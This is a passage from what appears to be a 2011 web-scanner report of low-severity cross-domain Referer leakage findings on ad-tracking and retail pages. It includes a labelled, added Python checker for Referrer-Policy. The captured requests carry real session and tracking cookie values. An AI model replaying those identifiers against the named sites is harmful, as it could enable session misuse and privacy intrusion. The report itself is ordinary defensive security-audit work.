Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://american.redcross.org/site/PageServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://american.redcross.org
Path:   /site/PageServer

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /site/PageServer?pagename=ntld_main HTTP/1.1
Host: american.redcross.org
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JServSessionIdr004=56wkc7syu1.app295a; CLEQ_a=2d41dafa2ef247ac865c7e43c1370000.1; CLEQ_t=1; CLEQ_y=1; __utmz=63105840.1305509976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63105840.861654851.1305509976.1305509976.1305509976.1; __utmc=63105840; __utmb=63105840.1.10.1305509976

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:05 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Content-Length: 15602

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<base href="http://american.redcross.org/site/PageServer?pagename=ntld_main" />

<title>American Red Cross: Donate Funds<
...[SNIP]...
<li id="givetime"><a href="http://www.redcrossstore.org/"><strong>
...[SNIP]...
<font size="1">This site can only accept U.S. issued credit cards. If you are located outside the U.S., please contact your <a href="http://www.ifrc.org/en/who-we-are/directory/">National Red Cross or Red Crescent Society</a>
...[SNIP]...

17.2. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /?pixid=99002087 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 16 May 2011 01:53:52 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

17.3. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /?pixid=99007235 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 225
Date: Mon, 16 May 2011 01:53:52 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1">here</a>
...[SNIP]...

17.4. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /?pixid=99003829 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ad.doubleclick.net/activity;src=1776986;dcnet=4591;boom=19210;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 225
Date: Mon, 16 May 2011 01:54:10 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://ad.doubleclick.net/activity;src=1776986;dcnet=4591;boom=19210;sz=1x1">here</a>
...[SNIP]...

17.5. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /TGI2/proc/stateselector.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:33:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><title>
   State Se
...[SNIP]...
<span class="hackerSafe"><a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.travelguard.com"><img id="imgScanAlert" border="0" src="" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert');
...[SNIP]...
<div class="verisignFooter"><script src="https://seal.verisign.com/getseal?host_name=buy.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

17.6. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Mon, 16 May 2011 01:54:09 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...
<div style="margin-left: 4em;">See <a href="http://www.google.com/support/bin/answer.py?answer=86640">Google Help</a>
...[SNIP]...
<div style="text-align: center; border-top: 1px solid #dfdfdf;">&copy; 2009 Google - <a href="http://www.google.com">Google Home</a>
...[SNIP]...

17.7. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...
Of('sitrackingid') > 0){
}else{
if( si_pageurl.indexOf('sisearchengine') > 0){
}else{
};
};
}
DeliverThirdPartyPixels();
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="https://fls.doubleclick.net/activityi;src=1667271;type=jan20557;cat=ftdse646;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
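The issue detail above is the scanner's reasoning in one sentence: the page was requested with a query string, and its response pulls resources from third-party hosts, so each of those fetches can carry the full page URL in the Referer header. The script below is added here as an example; it is not part of the original report and not Burp Suite's own code. It reproduces that check over a response body: it lists cross-domain src/href/action targets, records whether the request URL carried a query string (a bare trailing "?" counts, matching the report, which flags the /activityi URLs whose part after "?" is empty), and checks for a Referrer-Policy header that would keep the query string from leaving the origin. The sample URL and markup are copied from the 17.9 record; the /same-host-pixel.gif line and the hardened header set are constructed for this example. Browsers of the report's era sent the full URL cross-site by default; current browsers default to strict-origin-when-cross-origin, so the header check matters mostly for pages that opt back in with unsafe-url or no-referrer-when-downgrade.

```python
"""Cross-domain Referer leakage check (added example; not from the report or Burp Suite).

For a page fetched from a request URL that returns HTML, list every sub-resource
or link that points at another host. If the request URL carried a query string
and the response sets no restrictive Referrer-Policy, a browser that sends the
full URL in Referer (the 2011-era default) hands the page URL, query string
included, to each of those hosts.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs that make the browser fetch or navigate to a URL.
_URL_ATTRS = {
    "img": ("src",), "script": ("src",), "iframe": ("src",), "frame": ("src",),
    "embed": ("src",), "a": ("href",), "link": ("href",), "form": ("action",),
}

# Policies under which the query string never reaches a cross-site destination.
_RESTRICTIVE_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


class _LinkCollector(HTMLParser):
    """Collects (tag, attribute, raw value) for every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        wanted = _URL_ATTRS.get(tag.lower())
        if not wanted:
            return
        for name, value in attrs:
            if name.lower() in wanted and value:
                self.found.append((tag.lower(), name.lower(), value))


def cross_domain_links(request_url, html):
    """Return (tag, attr, absolute_url) for each reference to a host other than the page's."""
    collector = _LinkCollector()
    collector.feed(html)
    page_host = urlsplit(request_url).hostname
    links = []
    for tag, attr, raw in collector.found:
        absolute = urljoin(request_url, raw)  # resolves relative and scheme-relative URLs
        target = urlsplit(absolute)
        if target.scheme in ("http", "https") and target.hostname and target.hostname != page_host:
            links.append((tag, attr, absolute))
    return links


def effective_referrer_policy(headers):
    """Last non-empty token of a (possibly comma-separated) Referrer-Policy header wins."""
    value = {k.lower(): v for k, v in headers.items()}.get("referrer-policy", "")
    tokens = [t.strip().lower() for t in value.split(",") if t.strip()]
    return tokens[-1] if tokens else ""


def referer_leak_risk(request_url, headers, html):
    """Reproduce the report's check and add the Referrer-Policy caveat."""
    # A bare trailing "?" counts, matching the report, which flags /activityi URLs
    # whose part after "?" is empty; their data rides in the path (;src=...;num=...).
    has_query = "?" in request_url.split("#", 1)[0]
    links = cross_domain_links(request_url, html)
    policy = effective_referrer_policy(headers)
    return {
        "query_string": has_query,
        "cross_domain_links": links,
        "referrer_policy": policy,
        "leaks_query_string": has_query and bool(links) and policy not in _RESTRICTIVE_POLICIES,
    }


# Sample request and markup copied from the 17.9 record; the same-host pixel line
# and the hardened header set are constructed for this example.
SAMPLE_URL = ("http://fls.doubleclick.net/activityi;src=1774243;type=trave073;"
              "cat=trave431;ord=1;num=6946086450479.925?")
SAMPLE_HEADERS = {"Server": "Floodlight", "Content-Type": "text/html",
                  "X-Frame-Options": "ALLOWALL", "X-Content-Type-Options": "nosniff"}
SAMPLE_HTML = """<html><body style="background-color: transparent">
<img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
<img src="/same-host-pixel.gif" width="1" height="1" />
</body></html>"""
HARDENED_HEADERS = dict(SAMPLE_HEADERS, **{"Referrer-Policy": "strict-origin-when-cross-origin"})

if __name__ == "__main__":
    for label, hdrs in (("as served", SAMPLE_HEADERS), ("with Referrer-Policy", HARDENED_HEADERS)):
        result = referer_leak_risk(SAMPLE_URL, hdrs, SAMPLE_HTML)
        print(label, "- leaks query string:", result["leaks_query_string"])
        for tag, attr, url in result["cross_domain_links"]:
            print("  ", tag, attr, url)
```

Run as-is it reports the three third-party targets from the sample and a leak with the headers as served, and no leak once the hardened Referrer-Policy is present; the same-host pixel is resolved against the page URL and ignored. The same check applies unchanged to every 17.x record in this section, since they differ only in the host and the set of third-party pixels.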

17.8. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=63965571? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:56 GMT
Expires: Mon, 16 May 2011 01:53:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1023

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA">
</script>
<noscript>
<img border="0" src="https://r.turn.com/r/beacon?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA&cid=">
</noscript>
...[SNIP]...

17.9. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=6946086450479.925? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:54:40 GMT
Expires: Mon, 16 May 2011 01:54:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2190

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tglb_cs=1&betq=10393=417020" width = "1" height = "1" border = "0"><img src="https://ad.doubleclick.net/activity;src=1857234;dcnet=4845;boom=23858;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1057254703/?label=s2deCJXnSRCv2pH4Aw&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<img src="https://pixel.rubiconproject.com/tap.php?v=4112" border="0" width="1" height="1"><img src="https://n4403ad.doubleclick.net/ad/gn.bfp_travelguard/iperez_02232010;sect=iperez_02232010;sz=1x7"><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" /><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&amp;guid=ON&amp;script=0"/><img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

17.10. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3072598970029.503? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 02:01:38 GMT
Expires: Mon, 16 May 2011 02:01:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2461

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502" width = "1" height = "1" border = "0"><IMG SRC="http://bp.specificclick.net?pixid=99002087" width=0 height=0 border=0><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839" width = "1" height = "1" border = "0"><img src='http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=885712538' width='1' height='1' />
<img height="1" width="1" src="http://view.atdmt.com/action/DPM_Helzberg_Homepage"/><img src="http://ads.bluelithium.com/pixel?id=601754&t=2" width="1" height="1" /><img src="https://ad.yieldmanager.com/pixel?id=628032&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2" width="1" height="1" />
<img src="http://ad.doubleclick.net/activity;src=2583709;type=helz1;cat=helzhp;ord=1;num=885712538?" width=1 height=1 border=0>
<img src="http://action.mathtag.com/mm//HELZ//red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=885712538" width="1" height="1" />
<img src="http://ads.adbrite.com/adserver/vdi/684339?d=110" height="1" width="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110" height="1" width="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days" height="1" width="1"><!-- Google Code for Homepage Clearance Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

17.11. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:50 GMT
Expires: Mon, 16 May 2011 01:53:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2464

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502" width = "1" height = "1" border = "0"><IMG SRC="http://bp.specificclick.net?pixid=99002087" width=0 height=0 border=0><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839" width = "1" height = "1" border = "0"><img src='http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1475687857' width='1' height='1' />
<img height="1" width="1" src="http://view.atdmt.com/action/DPM_Helzberg_Homepage"/><img src="http://ads.bluelithium.com/pixel?id=601754&t=2" width="1" height="1" /><img src="https://ad.yieldmanager.com/pixel?id=628032&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2" width="1" height="1" />
<img src="http://ad.doubleclick.net/activity;src=2583709;type=helz1;cat=helzhp;ord=1;num=1475687857?" width=1 height=1 border=0>
<img src="http://action.mathtag.com/mm//HELZ//red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=1475687857" width="1" height="1" />
<img src="http://ads.adbrite.com/adserver/vdi/684339?d=110" height="1" width="1">
